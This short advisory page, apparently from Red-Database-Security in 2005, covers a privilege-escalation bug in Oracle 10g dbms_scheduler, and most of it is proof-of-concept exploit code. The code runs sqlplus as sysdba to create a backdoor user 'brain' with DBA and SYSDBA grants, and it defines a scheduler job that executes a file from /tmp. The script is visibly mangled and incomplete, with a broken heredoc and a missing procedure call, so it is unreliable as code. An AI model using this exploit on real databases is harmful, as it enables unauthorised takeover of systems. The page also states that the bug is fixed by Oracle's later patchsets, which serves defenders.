Oracle 10g Exploit dbms_scheduler
The following proof of concept exploit code allows any user with CREATE JOB privileges to execute OS commands in the context of the user Oracle.
echo "Operator, are you pondering what I am pondering? " >/dev/console
sqlplus "/ as sysdba " < <EOF
create user brain identified by takeover default tablespace system;
grant connect,resource,dba to brain;
grant sysdba to brain;
program_name = > 'take_over_the_world ',
program_action = > '/tmp/pinky_and_the_brain ',
program_type = > 'EXECUTABLE ',
comments = > 'I rulez ');
This bug is fixed after applying the patchset for Oracle alert 68 or later patchsets.
Pete Finnigan's Security Advisotry - Bug in dbms_scheduler
© 2005 by Red-Database-Security GmbH - last update 02-nov-2005